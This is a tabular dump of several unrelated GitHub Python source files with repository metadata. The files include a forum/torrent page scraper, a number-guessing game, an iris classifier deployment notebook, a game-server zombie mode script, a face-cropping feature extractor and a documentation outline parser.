repo_name
stringlengths
7
111
__id__
int64
16.6k
19,705B
blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
5
151
content_id
stringlengths
40
40
detected_licenses
sequence
license_type
stringclasses
2 values
repo_url
stringlengths
26
130
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringlengths
4
42
visit_date
unknown
revision_date
unknown
committer_date
unknown
github_id
int64
14.6k
687M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
12 values
gha_fork
bool
2 classes
gha_event_created_at
unknown
gha_created_at
unknown
gha_updated_at
unknown
gha_pushed_at
unknown
gha_size
int64
0
10.2M
gha_stargazers_count
int32
0
178k
gha_forks_count
int32
0
88.9k
gha_open_issues_count
int32
0
2.72k
gha_language
stringlengths
1
16
gha_archived
bool
1 class
gha_disabled
bool
1 class
content
stringlengths
10
2.95M
src_encoding
stringclasses
5 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
10
2.95M
extension
stringclasses
19 values
num_repo_files
int64
1
202k
filename
stringlengths
4
112
num_lang_files
int64
1
202k
alphanum_fraction
float64
0.26
0.89
alpha_fraction
float64
0.2
0.89
hex_fraction
float64
0
0.09
num_lines
int32
1
93.6k
avg_line_length
float64
4.57
103
max_line_length
int64
7
931
defchen/LearningPython
850,403,574,402
6c6d6adf8bb666987fe66f6fccbd517d0d402fd4
061fa1504d59e24bc379c4c91670f926aa516d07
/learning/spider/spider_to_1024.py
29d2d579f17ade1d2f38a0c8b5056246a91167ed
[]
no_license
https://github.com/defchen/LearningPython
a5189c643fee667e0705bce24e385bf7e4288ae5
eaae52dd7aef3ba97b333b784f2fcf8b9ba5002b
refs/heads/master
"2021-01-22T10:46:34.776000"
"2017-02-15T07:53:31"
"2017-02-15T07:53:31"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
""" @Author: liujinjia @Date: 2017-02-15 13:52:42 @Project : LearningPython @File : spider_to_1024.py @Last Modified by: liujinjia @Last Modified time: 2017-02-15 15:49:05 """ import requests from bs4 import BeautifulSoup class Spider: """ 1024 img spider """ start_url = 'http://www.dxlymm.com/thread0806.php?fid=5' session = requests.Session() @classmethod def get_home_page(cls, url=None): """ get 1024 img page """ if url is None: page = cls.session.get(cls.start_url) else: page = cls.session.get(url) page.encoding = 'gbk' return page.text @classmethod def parse_pages(cls): """ parse 1024 pages """ parse = BeautifulSoup(cls.get_home_page(), 'lxml') parse = parse.findAll('tr') return parse @classmethod def get_uri_list(cls): """ get parse list url """ uri_list = [] for item in cls.parse_pages(): if item.h3 is not None: # print(item.h3.a.get('href'), item.h3.a.string) uri_list.append("http://www.dxlymm.com/" + item.h3.a.get('href')) return uri_list @classmethod def get_seed_page(cls): """ get pages seeds """ page = cls.get_home_page(cls.get_uri_list()[11]) return BeautifulSoup(page, 'lxml').find('a', {"target": "_blank"}).string @classmethod def get_seed(cls): """ get seeds http://www.rmdown.com/download.php?ref=163b9b55fba74fbc988124acb4db8b23bbc739bf55e&reff=MTQ4NzE0NDcwOA%3D%3D&submit=download this func get some element <INPUT size=58 name="ref" value="163b9b55fba74fbc988124acb4db8b23bbc739bf55e" style="font-size:10px;"><INPUT TYPE="hidden" NAME="reff" value="MTQ4NzE0NDU2Nw=="><BR> get this tags , value and value splicing into url, download seeds! """ page = cls.get_home_page(cls.get_seed_page()) print(page) if __name__ == '__main__': print(Spider.get_seed())
UTF-8
Python
false
false
2,033
py
3
spider_to_1024.py
3
0.596353
0.54066
0
67
29.268657
132
IsaacYAGI/python-ejercicios
2,327,872,276,990
8498ba69e4cc5c5f480644ac20d878fb2a632bee
50b69776bee7ad3a6068235c6c8981c06a17629a
/tema39-biblioteca-estandar-python/ejercicios-propuestos/ejercicio_propuestos1_tema39.py
aec8b8678f361a8deff93de03c4eb45b80a56732
[]
no_license
https://github.com/IsaacYAGI/python-ejercicios
665db9b6286d4840e8fa9c2d9b42b1389753b806
fe8d9b96a7e947dd3fa992dfac39049fa68935c5
refs/heads/master
"2021-06-04T11:03:53.466000"
"2017-07-29T03:17:15"
"2017-07-29T03:17:15"
98,049,960
3
3
null
false
"2021-02-24T05:07:15"
"2017-07-22T18:20:42"
"2017-07-22T20:33:05"
"2021-02-24T05:06:37"
23
0
1
0
Python
false
false
''' Confeccionar un programa que genere un número aleatorio entre 1 y 100 y no se muestre. El operador debe tratar de adivinar el número ingresado. Cada vez que ingrese un número mostrar un mensaje "Gano" si es igual al generado o "El número aleatorio el mayor" o "El número aleatorio es menor". Mostrar cuando gana el jugador cuantos intentos necesitó. ''' import random def generar_numero_aleatorio(): return random.randint(1,100) def es_el_numero(resp_usuario,resp_correc): return resp_usuario == resp_correc def numero_dado_es_mayor(resp_usuario,resp_correc): return resp_usuario > resp_correc def juego_terminado(numero_correcto,numero_intentos): print("El juego ha terminado!") print("El numero correcto era",numero_correcto,"y lo resolviste en",numero_intentos,"intentos.",sep=" ") def el_numero_es_mayor(): print("El numero que diste es mayor al correcto, intenta de nuevo!") def el_numero_es_menor(): print("El numero que diste es menor al correcto, intenta de nuevo!") def iniciar_juego(): gano = False intentos = 1 numero = 0 respuesta_correc = generar_numero_aleatorio() while (not gano): numero = int(input("Ingresa un numero: ")) if (es_el_numero(numero,respuesta_correc)): juego_terminado(respuesta_correc,intentos) gano = True else: if (numero_dado_es_mayor(numero,respuesta_correc)): el_numero_es_mayor() else: el_numero_es_menor() intentos += 1 iniciar_juego()
UTF-8
Python
false
false
1,588
py
30
ejercicio_propuestos1_tema39.py
29
0.663717
0.656764
0
54
28.259259
147
jordanfalcao/tensorflow2-deeplearning
7,756,710,980,553
e491237e5c49d13e4363c4bcd0dd5fda87ca745f
6c64e6c286db85d8f57cdaf79f2e3a6109209bb2
/10-Deployment/01_my_basic_model.py
3aecceebbd6e086c156880dfb63e41bee7287843
[]
no_license
https://github.com/jordanfalcao/tensorflow2-deeplearning
0f929a6429057c3da19e382245ab493e08b0c18a
2d88d4cb888226cfda7ac4c163fceb452aba103a
refs/heads/main
"2023-07-10T17:58:09.864000"
"2021-08-19T23:29:00"
"2021-08-19T23:29:00"
383,968,761
0
0
null
false
"2021-08-05T22:44:38"
"2021-07-08T01:34:38"
"2021-08-04T19:42:33"
"2021-08-05T22:44:37"
36,592
0
0
0
Jupyter Notebook
false
false
# -*- coding: utf-8 -*- """01-My-Basic-Model.ipynb Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/1mwM8WLV4fZGkmgwC4EVh91Hfz2bqfUR9 # DEPLOYMENT **Welcome to deployment section! In this section of the course, we will go through the entire deployment process, starting as if you had to create a servicable model from scratch, then deploy it for others to use, either through API or a web form.** # Data For this example we use the very common data set: [iris dataset](https://en.wikipedia.org/wiki/Iris_flower_data_set), which is about flowers. From Wikipedia: The Iris flower data set or Fisher's Iris data set is a multivariate data set introduced by the British statistician and biologist Ronald Fisher in his 1936 paper The use of multiple measurements in taxonomic problems as an example of linear discriminant analysis.[1] It is sometimes called Anderson's Iris data set because Edgar Anderson collected the data to quantify the morphologic variation of Iris flowers of three related species.[2] Two of the three species were collected in the Gaspé Peninsula "all from the same pasture, and picked on the same day and measured at the same time by the same person with the same apparatus".[3] The data set consists of 50 samples from each of three species of Iris (Iris setosa, Iris virginica and Iris versicolor). Four features were measured from each sample: the length and the width of the sepals and petals, in centimeters. """ import numpy as np import pandas as pd import matplotlib.pyplot as plt iris = pd.read_csv("iris.csv") iris.head() """## Data Processing ### Features and Target """ X = iris.drop('species',axis=1) y = iris['species'] y.unique() # Lots of ways to one hot encode # https://stackoverflow.com/questions/47573293/unable-to-transform-string-column-to-categorical-matrix-using-keras-and-sklearn # https://stackoverflow.com/questions/35107559/one-hot-encoding-of-string-categorical-features from sklearn.preprocessing import LabelBinarizer encoder = LabelBinarizer() y = encoder.fit_transform(y) y[45:55] """## Train Test Split""" from sklearn.model_selection import train_test_split from sklearn.preprocessing import MinMaxScaler X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=101) """### Scaling""" scaler = MinMaxScaler() scaler.fit(X_train) scaled_X_train = scaler.transform(X_train) scaled_X_test = scaler.transform(X_test) """## Model ### Creating the Model """ from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense model = Sequential() model.add(Dense(units=4,activation='relu',input_shape=[4,])) # Last layer for multi-class classification of 3 species model.add(Dense(units=3,activation='softmax')) model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy']) """## Model Training""" from tensorflow.keras.callbacks import EarlyStopping early_stop = EarlyStopping(patience=10) # model.fit(x=scaled_X_train, # y=y_train, # epochs=300, # validation_data=(scaled_X_test, y_test), verbose=1 ,callbacks=[early_stop]) """## Model Evaluation""" metrics = pd.DataFrame(model.history.history) metrics.head() metrics[['loss','val_loss']].plot() plt.show() metrics[['accuracy','val_accuracy']].plot() plt.show() model.evaluate(scaled_X_test,y_test,verbose=0) """## Ready Model for Deployment""" epochs = len(metrics) # all the data scaled_X = scaler.fit_transform(X) model = Sequential() model.add(Dense(units=4,activation='relu')) # Last layer for multi-class classification of 3 species model.add(Dense(units=3,activation='softmax')) model.compile(optimizer='adam', loss='categorical_crossentropy',metrics=['accuracy']) model.fit(scaled_X,y,epochs=epochs) model.evaluate(scaled_X_test,y_test,verbose=0) model.save("final_iris_model.h5") """### Saving Scaler""" import joblib joblib.dump(scaler,'iris_scaler.pkl') """## Predicting a Single New Flower""" from tensorflow.keras.models import load_model flower_model = load_model("final_iris_model.h5") flower_scaler = joblib.load("iris_scaler.pkl") iris.head(1) flower_example = {'sepal_length':5.1, 'sepal_width':3.5, 'petal_length':1.4, 'petal_width':0.2} flower_example.keys() encoder.classes_ def return_prediction(model,scaler,sample_json): # For larger data features, you should probably write a for loop # That builds out this array for you s_len = sample_json['sepal_length'] s_wid = sample_json['sepal_width'] p_len = sample_json['petal_length'] p_wid = sample_json['petal_width'] flower = [[s_len,s_wid,p_len,p_wid]] flower = scaler.transform(flower) classes = np.array(['setosa', 'versicolor', 'virginica']) class_ind = np.argmax(model.predict(flower), axis=-1) # deprecated # class_ind = model.predict_classes(flower) return classes[class_ind][0] # calling the fuction return_prediction(flower_model,flower_scaler,flower_example)
UTF-8
Python
false
false
5,143
py
70
01_my_basic_model.py
36
0.720537
0.706145
0
186
26.650538
636
takecian/ProgrammingStudyLog
13,984,413,562,158
46099aa352116e9ec26130b601e61b559c60c7fe
bde6ed092b7b29703737e11c5a5ff90934af3d74
/AtCoder/typical_dp/006c.py
2e87c3a9bfb5a07e9b900a274e0044898c002dc6
[]
no_license
https://github.com/takecian/ProgrammingStudyLog
2ab7ea601e0996b3fa502b81ec141bc3772442b6
94485d131c0cc9842f1f4799da2d861dbf09b12a
refs/heads/master
"2023-04-28T16:56:18.943000"
"2023-04-18T06:34:58"
"2023-04-18T06:34:58"
128,525,713
4
0
null
false
"2022-12-09T06:15:19"
"2018-04-07T12:21:29"
"2022-07-04T14:37:10"
"2022-12-09T06:15:18"
18,241
3
0
7
Python
false
false
# https://beta.atcoder.jp/contests/abc006/tasks/abc006_3 # a + b + c = N # 2a + 3b + 4c = M N, M = map(int, input().split()) # # ans_a = -1 # ans_a = -1 # ans_a = -1 # # for a in range(N+1): # rest = N - a # for b in range(rest+1): # c = rest - b # if c < 0: # break # if 2 * a + 3 * b + 4 * c == M: # print(str(a) + ' ' + str(b) + ' ' + str(c) + '\n') # exit(0) # # print('-1 -1 -1\n') # # in case of 0 elder person # a + c = N # 2a + 4c = M if M % 2 == 0: a = 2 * N - M // 2 c = M // 2 - N if a >= 0 and c >= 0: print(str(a) + ' 0 ' + str(c) + '\n') exit(0) if M % 2 == 1: a = 2 * N - (M + 1) // 2 c = -N + (M - 1) // 2 if a >= 0 and c >= 0: print(str(a) + ' 1 ' + str(c) + '\n') exit(0) print('-1 -1 -1\n') # in case of 1 elder person # a + c = N - 1 # 2a + 4c = M - 3
UTF-8
Python
false
false
902
py
883
006c.py
861
0.370288
0.310421
0
46
18.608696
64
sntzhd/sntzhd_back
5,617,817,273,287
a3b60d92805b9955365f9eccdc031a62f67b9ee2
8424f7ca88935497df49544e60e9ed48a6243e0e
/backend_api/indication/endpoints.py
b15d252109df992eaa34b10641e96eede5b7ae34
[]
no_license
https://github.com/sntzhd/sntzhd_back
622996d0ea917f4a24fbb74620fb130266979078
13128989bd53657d55c5154f56e56a5944f7b771
refs/heads/master
"2023-05-24T09:25:05.120000"
"2021-06-13T11:16:58"
"2021-06-13T11:16:58"
367,019,313
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from fastapi import Depends, FastAPI, HTTPException, APIRouter from backend_api.db.sql_app import crud, database, models, schemas from backend_api.db.sql_app.database import db_state_default database.db.connect() database.db.create_tables([models.Item]) database.db.close() router = APIRouter() async def reset_db_state(): database.db._state._state.set(db_state_default.copy()) database.db._state.reset() def get_db(db_state=Depends(reset_db_state)): try: database.db.connect() yield finally: if not database.db.is_closed(): database.db.close() @router.post( "/items/", response_model=schemas.ItemBase, dependencies=[Depends(get_db)], ) def create_item_for_user(item: schemas.ItemBase): return crud.create_item(item=item)
UTF-8
Python
false
false
796
py
37
endpoints.py
32
0.69598
0.69598
0
31
24.709677
66
EmaSMach/info2020
12,970,801,279,010
8e13fbe8b71dccad22b43ca25bbdb368d8776d0a
fdb8d96d06cb7e74153a178fd17b449e89f44cd0
/desafios/complementarios/condicionales/desafio16_descuento_camisas.py
1183312cd82977baba879c036daddeb3c2dd341f
[]
no_license
https://github.com/EmaSMach/info2020
c84916521d2dd21040419cb469c76c589b98be89
a184dc376cb5e0b894a32d01681b71c824d993d3
refs/heads/master
"2022-12-06T08:52:34.994000"
"2020-08-24T02:57:40"
"2020-08-24T02:57:40"
273,131,222
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# Desafío 16 # Hacer un programa que calcule el total a pagar por la compra de camisas. # Si se compran tres camisas o mas se aplica un descuento del 20% sobre el # total de la compra y si son menos de tres camisas un descuento del 10%. cantidad_camnisas = int(input("Camisas Compradas: ")) precio_camisa = float(input("Precio camisa: ")) if cantidad_camnisas >= 3: descuento = 20 else: descuento = 10 subtotal = precio_camisa * cantidad_camnisas print(f"Total a pagar: $ {subtotal - (subtotal*descuento/100)}")
UTF-8
Python
false
false
528
py
67
desafio16_descuento_camisas.py
67
0.719165
0.6926
0
17
30
75
Colorpinpoint/pyspades-userscripts
8,486,855,423,698
7d1293b78c5de507e828d9512a246869993c9615
87df4bda6d6da9b1ce0360328a372c54037e4264
/zombies.py
c6ed0877c75ab263f9846bbed0182904367f4b8f
[]
no_license
https://github.com/Colorpinpoint/pyspades-userscripts
58910c3ca3c3b31d5f9c8d76b5a55e97c083fd10
e0c24f10312d9f72031723747c48fbd456e780bf
refs/heads/master
"2016-10-10T11:35:46.593000"
"2012-07-30T03:23:18"
"2012-07-30T03:23:18"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from pyspades.server import orientation_data, grenade_packet, weapon_reload, set_tool from pyspades.common import coordinates, Vertex3 from pyspades.world import Grenade from commands import add, admin from math import sin, floor, atan2 from pyspades.constants import * from pyspades.server import block_action from pyspades.collision import distance_3d from twisted.internet.task import LoopingCall HEAL_RATE = 1000 HUMAN = 1 ZOMBIE = 2 # ZOMBIE_HUMAN = HUMAN | ZOMBIE S_ZOMBIE_VERSION = 'Zombies 1.1.0 RC1 by Dany0, infogulch' S_ZOMBIE_HEALTH = 'Zombie health is %i.' S_ZOMBIE_TELEPORT = 'Zombies teleport %i blocks high.' S_ZOMBIE_SPAWN = 'Zombies spawn %i blocks high.' S_ZOMBIE_STAT = S_ZOMBIE_HEALTH + ' ' + S_ZOMBIE_TELEPORT + ' ' + S_ZOMBIE_SPAWN @admin def zhp(connection, value): if value == 0: a = True protocol = connection.protocol protocol.ZOMBIE_HP = abs(float(value)) connection.send_chat(S_ZOMBIE_HEALTH % value) @admin def ztel(connection, value): protocol = connection.protocol val = abs(int(value)) protocol.ZOMBIE_TELEPORT = val connection.send_chat(S_ZOMBIE_TELEPORT % val) @admin def zspawnheight(connection, value): protocol = connection.protocol val = abs(int(value)) if val >= 10: protocol.ZOMBIE_SPAWN_HEIGHT = val connection.send_chat(S_ZOMBIE_SPAWN % val) elif val < 10: protocol.ZOMBIE_SPAWN_HEIGHT = 0 connection.send_chat('Disabling zombie spawning up in the air') def zombiestat(connection): connection.send_chat(S_ZOMBIE_VERSION) connection.send_chat(S_ZOMBIE_STAT % (connection.protocol.ZOMBIE_HP, connection.protocol.ZOMBIE_TELEPORT)) add(ztel) add(zhp) add(zombiestat) add(zspawnheight) def apply_script(protocol, connection, config): class ZombiesProtocol(protocol): def __init__(self, *arg, **kw): protocol.__init__(self, *arg, **kw) self.ZOMBIE_TELEPORT = 17 self.ZOMBIE_HP = 650 self.ZOMBIE_SPAWN_HEIGHT = 0 class ZombiesConnection(connection): zombies_playermode = 0 #must be a class instance variable to overload connection.refill() def on_spawn(self, pos): if self.team is self.protocol.green_team: # once spawned, human-zombies turn back into zombies self.zombies_playermode = ZOMBIE self.health_message = False self.quickbuild_allowed = False self.clear_ammo() ## this makes zombies appear to have a weapon when they have a block # set_tool.player_id = self.player_id # set_tool.value = SPADE_TOOL # self.protocol.send_contained(set_tool, sender = self) if self.protocol.ZOMBIE_SPAWN_HEIGHT > 0: player_location = self.world_object.position loc = (player_location.x, player_location.y, player_location.z - self.protocol.ZOMBIE_SPAWN_HEIGHT) self.set_location_safe(loc) else: self.zombies_playermode = HUMAN self.health_message = True self.quickbuild_allowed = True return connection.on_spawn(self, pos) def create_explosion_effect(self, position): self.protocol.world.create_object(Grenade, 0.1, position, None, Vertex3(), None) grenade_packet.value = 0.0 grenade_packet.player_id = 32 grenade_packet.position = position.get() grenade_packet.velocity = (0.0, 0.0, 0.0) self.protocol.send_contained(grenade_packet) def on_line_build_attempt(self, points): if self.zombies_playermode == ZOMBIE: return False return connection.on_line_build_attempt(points) def on_block_build_attempt(self, x, y, z): if self.zombies_playermode == ZOMBIE: return False return connection.on_block_build_attempt(self, x, y, z) def on_block_destroy(self, x, y, z, value): if (self.zombies_playermode == ZOMBIE and value == DESTROY_BLOCK and self.tool == SPADE_TOOL): map = self.protocol.map ztel = self.protocol.ZOMBIE_TELEPORT player_location = self.world_object.position px, py, pz = player_location.x, player_location.y, player_location.z if (not map.get_solid(px, py, pz-ztel+1) and not map.get_solid(px, py, pz-ztel+2) and not map.get_solid(px, py, pz-ztel+3)): self.create_explosion_effect(player_location) self.set_location((px, py, pz - ztel)) return connection.on_block_destroy(self, x, y, z, value) def on_flag_capture(self): if self.team is self.protocol.green_team: self.zombies_playermode = HUMAN self.refill() self.send_chat('YOU ARE HUMAN NOW RAWR GO SHOOT EM') self.protocol.send_chat('%s has become a human-zombie and can use weapons!' % self.name) return connection.on_flag_capture(self) def on_flag_take(self): if self.team is self.protocol.blue_team: self.set_hp(self.hp*2) else: self.set_hp(self.hp/1.6) return connection.on_flag_take(self) def on_grenade(self, time_left): if self.zombies_playermode == ZOMBIE: self.send_chat("Zombie! You fool! You forgot to unlock the pin! It's useless now!") return False return connection.on_grenade(self, time_left) def on_hit(self, hit_amount, hit_player, type, grenade): new_hit = connection.on_hit(self, hit_amount, hit_player, type, grenade) if new_hit is not None: return new_hit other_player_location = hit_player.world_object.position other_player_location = (other_player_location.x, other_player_location.y, other_player_location.z) player_location = self.world_object.position player_location = (player_location.x, player_location.y, player_location.z) dist = floor(distance_3d(player_location, other_player_location)) damagemulti = (sin(dist/80))+1 new_hit = hit_amount * damagemulti if self is hit_player: if type == FALL_KILL: return False elif hit_player.zombies_playermode == ZOMBIE and self.weapon == SMG_WEAPON: new_hit = (new_hit/(self.protocol.ZOMBIE_HP/100)) if new_hit >=25: self.create_explosion_effect(hit_player.world_object.position) self.send_chat("!!!HOLY SHIT UBER DAMAGE!!!") elif hit_player.zombies_playermode == ZOMBIE and self.weapon != SMG_WEAPON: if self.weapon == SHOTGUN_WEAPON: new_hit = new_hit/(self.protocol.ZOMBIE_HP/100)/8 else: new_hit = new_hit/(self.protocol.ZOMBIE_HP/100) if new_hit >=25: self.create_explosion_effect(hit_player.world_object.position) self.send_chat("!!!HOLY SHIT UBER DAMAGE!!!") elif self.zombies_playermode == ZOMBIE and type != MELEE_KILL: return False #this should never happen, but just in case elif (self.team is self.protocol.blue_team and self.team == hit_player.team and type == MELEE_KILL): if hit_player.hp >= 100: if self.health_message == True: self.health_message = False self.send_chat(hit_player.name + ' is at full health.') elif hit_player.hp > 0: hit_player.set_hp(hit_player.hp + HEAL_RATE) return new_hit def on_kill(self, killer, type, grenade): if killer != None and killer != self: if killer.zombies_playermode == HUMAN: killer.refill() killer.send_chat('You have been refilled!') else: self.send_chat('THE ZOMBIES ARE COMING RAWRRR') killer.set_hp(killer.hp + 25 - killer.hp/10) return connection.on_kill(self, killer, type, grenade) def clear_ammo(self): weapon_reload.player_id = self.player_id weapon_reload.clip_ammo = 0 weapon_reload.reserve_ammo = 0 self.weapon_object.clip_ammo = 0 self.weapon_object.reserve_ammo = 0 self.send_contained(weapon_reload) def refill(self, local = False): connection.refill(self, local) if self.zombies_playermode == ZOMBIE: self.clear_ammo() def on_login(self, name): protocol = self.protocol self.send_chat(S_ZOMBIE_STAT % (protocol.ZOMBIE_HP, protocol.ZOMBIE_TELEPORT, protocol.ZOMBIE_SPAWN_HEIGHT)) return connection.on_login(self, name) return ZombiesProtocol, ZombiesConnection
UTF-8
Python
false
false
9,454
py
5
zombies.py
4
0.576687
0.568542
0
212
43.599057
120
newasu/FaceRecognitionPython
11,957,188,952,317
2692af2249efecee8bd76aebecd71882c942d08e
db6ba700742584d71bd2f9f1d66627060235bb49
/Scripts/testscript_11.py
c909039f83568b5e7a7f880f21920b507cd34489
[]
no_license
https://github.com/newasu/FaceRecognitionPython
27119747e53975a4c19fcf4b89682a4df7498606
536bcfeb852fd1c4f93b59636fbb6182b5e9996f
refs/heads/master
"2021-07-21T05:20:40.363000"
"2021-02-01T08:38:04"
"2021-02-01T08:38:04"
237,888,319
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# Add project path to sys import sys sys.path.append("./././") # Import lib import pandas as pd import numpy as np import os import glob import cv2 from mtcnn.mtcnn import MTCNN import tensorflow as tf from keras_vggface.vggface import VGGFace from keras_vggface import utils # Import my own lib import others.utilities as my_util gpu_id = 0 os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id) # Clear GPU cache tf.keras.backend.clear_session() gpus = tf.config.experimental.list_physical_devices('GPU') tf.config.experimental.set_memory_growth(gpus[0], True) ############################################################################################# # Path # Dataset path lfw_test_cleaned_path = my_util.get_path(additional_path=['.', '.', 'mount', 'FaceRecognitionPython_data_store', 'Dataset', 'lfw', 'DevTest', 'cleaned']) lfw_test_crop_face_path = my_util.get_path(additional_path=['.', '.', 'mount', 'FaceRecognitionPython_data_store', 'Dataset', 'lfw', 'DevTest', 'cropped']) # Make directory my_util.make_directory(lfw_test_crop_face_path) ############################################################################################# # Initialise dataframe my_column_names = ['gender', 'ethnicity', 'id', 'pose', 'path'] my_data = pd.DataFrame(columns=my_column_names) # List files dir_list = glob.glob(lfw_test_cleaned_path + '*/*') i = 0 for fp in dir_list: # print(str(i)) i = i+1 # Get path my_path = fp my_dir, my_filename = os.path.split(my_path) # Extract class my_dir = my_dir.split('/')[-1] my_gender, my_ethnicity = my_dir.split('-') # Extract ID my_filename = my_filename.split('.')[0] tmp = my_filename.rfind('_') my_id = my_filename[0:tmp] my_pose = int(my_filename[tmp+1:]) # Append my_data = my_data.append({'gender':my_gender, 'ethnicity':my_ethnicity, 'id':my_id, 'pose':my_pose, 'path':my_path}, ignore_index=True) # Sort my_data = my_data.sort_values(by=['id', 'pose'], ignore_index=True) # Unique id_unique = my_data['id'].unique() # Check correction for id_u in id_unique: tmp = my_data[my_data['id'] == id_u][['gender', 'ethnicity']] if tmp['gender'].unique().size > 1 or tmp['ethnicity'].unique().size > 1: print(id_u) # Initialise pretrained pretrained_model = VGGFace(model = 'resnet50') feature_layer = tf.keras.layers.Flatten(name='flatten')(pretrained_model.get_layer('avg_pool').output) model = tf.keras.models.Model(pretrained_model.input, feature_layer) # Detect face exacted_data = np.empty((0, 2048)) detector = MTCNN() for img_idx in range(0,my_data.shape[0]): print(str(img_idx)) # Load image img = cv2.cvtColor(cv2.imread(my_data['path'][img_idx]), cv2.COLOR_BGR2RGB) faces = detector.detect_faces(img) # Select biggest face face_idx = 0 if len(faces) > 1: facesize = [] for face in faces: _, _, width, height = face['box'] facesize.append(width*height) face_idx = np.argmax(facesize) # Crop face bbox = np.array(faces[face_idx]['box']) bbox[bbox<0] = 0 x1, y1, width, height = bbox x2, y2 = x1 + width, y1 + height img = img[y1:y2, x1:x2] # Convert color space img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR) # Extract feature by pretrained img = cv2.resize(img, (224,224)) img = tf.keras.preprocessing.image.img_to_array(img) img = np.expand_dims(img, axis=0) img = utils.preprocess_input(img, version=2) # vgg = 1, resnet = 2 feature_embedding = model.predict(img) exacted_data = np.vstack((exacted_data, feature_embedding)) # Save img # cv2.imwrite((lfw_test_crop_face_path + '/' + my_data.id.iloc[img_idx] + '_' + str(my_data.pose.iloc[img_idx]).zfill(4)) + '.jpg', img) # Concatenate my_data_columns = my_column_names my_data_columns = np.array(my_data_columns) my_data_columns = np.append(my_data_columns, np.char.add(np.tile('feature_', (2048)), np.array(range(1, 2048+1)).astype('U'))) my_data = np.concatenate((my_data.values, exacted_data), axis=1) my_data = pd.DataFrame(my_data, columns=my_data_columns) # Save my_data.to_csv('DevTest_cleaned.txt', header=True, index=False, sep=' ') print()
UTF-8
Python
false
false
4,195
py
55
testscript_11.py
52
0.626222
0.610727
0
129
31.51938
155
coreygirard/harbor
1,374,389,557,538
8875bbcb2bd4c9233439d324a82aa844ff0ef69f
7725ec91175db3e86edf0c5396f0b0dcc680ada1
/harbor/src/outline.py
21269e9c931db22a31f2a55923030bd0a170582a
[]
no_license
https://github.com/coreygirard/harbor
c4bf7829cd3cf5dca61f437321912c90a5a9988c
6ab255562e200eb47f6262e48e0b55978d83fd59
refs/heads/master
"2021-09-28T16:29:14.407000"
"2018-11-18T08:16:56"
"2018-11-18T08:16:56"
113,496,312
8
0
null
null
null
null
null
null
null
null
null
null
null
null
null
'''harbor: readme/how/outline { OUTLINE readme: README.md badges what why how intro outline patterns todo PATTERNS title: # {title} section: ### {section} }[code] {The outline section of the `.harbor` file must be preceded by `OUTLINE`. This section specifies the names of the files to be generated, and their internal structure}[p] ''' def extractOutline(text): ''' >>> text = ['OUTLINE', ... 'aaa', ... 'bbb', ... 'ccc', ... '', ... 'PATTERNS', ... 'ddd', ... 'eee', ... 'fff', ... ''] >>> extractOutline(text) ['aaa', 'bbb', 'ccc', ''] ''' assert(text.count('OUTLINE') <= 1) assert(text.count('PATTERNS') <= 1) if 'OUTLINE' in text: text = text[text.index('OUTLINE')+1:] if 'PATTERNS' in text: text = text[:text.index('PATTERNS')] return text '''harbor: readme/how/outline {Each line in the `OUTLINE` section without indentation denotes a file. The form is `aaa: bbb`, where `aaa` is the nickname for the file, and `bbb` is the actual filename to use when saving the generated documentation.}[p] {Basic outline indentation rules apply, with regard to how nesting works. The sections can have arbitrary names, excluding spaces. Best practice for multi-word sections is Lisp-style naming: `another-section` or `this-is-a-wordy-label`.}[p] ''' def getOutline(i): ''' >>> raw = [['OUTLINE', ... 'readme: README.md', ... ' aaa', ... ' bbb', ... ' ccc', ... ' ddd', ... ' eee', ... ' fff'], ... ['OUTLINE', ... 'quickstart: quickstart.md', ... ' step-1', ... ' step-2', ... ' step-3']] >>> getOutline(raw) == {'README.md':['readme', ... 'readme/aaa', ... 'readme/bbb', ... 'readme/bbb/ccc', ... 'readme/ddd', ... 'readme/ddd/eee', ... 'readme/ddd/fff'], ... 'quickstart.md': ['quickstart', ... 'quickstart/step-1', ... 'quickstart/step-2', ... 'quickstart/step-3']} True ''' text = [] for e in i: text += extractOutline(e) filenames = {} stack = {} for line in text: if line.strip() != '': n = len(line)-len(line.lstrip()) line = line.strip() assert(n%2 == 0) if n == 0: line,f = line.split(' ') line = line.strip(':') filenames[f] = [] stack[n] = line stack = {k:v for k,v in stack.items() if k <= n} path = '/'.join([stack[k] for k in sorted(stack.keys())]) filenames[f] += [path] return filenames
UTF-8
Python
false
false
3,148
py
19
outline.py
14
0.435197
0.431385
0
120
25.225
95
RiskIQ/msticpy
10,488,310,144,212
6e074d0ba4b9b69fdaae8da88c6bbd6723070bd4
373cd41477438cc8826cd2a2f8689be84f486339
/tests/datamodel/test_txt_df_magic.py
baf52606e5003c930809ff733806e64c924c83ef
[ "LicenseRef-scancode-generic-cla", "LGPL-3.0-only", "BSD-3-Clause", "LicenseRef-scancode-free-unknown", "ISC", "LGPL-2.0-or-later", "PSF-2.0", "Apache-2.0", "BSD-2-Clause", "LGPL-2.1-only", "Unlicense", "Python-2.0", "LicenseRef-scancode-python-cwi", "MIT", "LGPL-2.1-or-later", "GPL-2.0-or-later", "HPND", "ODbL-1.0", "GPL-1.0-or-later", "MPL-2.0" ]
permissive
https://github.com/RiskIQ/msticpy
cd42d601144299ec43631554076cc52cbb42dc98
44b1a390510f9be2772ec62cb95d0fc67dfc234b
refs/heads/master
"2023-08-27T00:11:30.098000"
"2021-06-17T22:54:29"
"2021-06-17T22:54:29"
374,787,165
1
0
MIT
true
"2021-09-16T19:05:43"
"2021-06-07T20:05:09"
"2021-07-29T16:04:07"
"2021-09-16T19:05:41"
23,582
1
0
0
Python
false
false
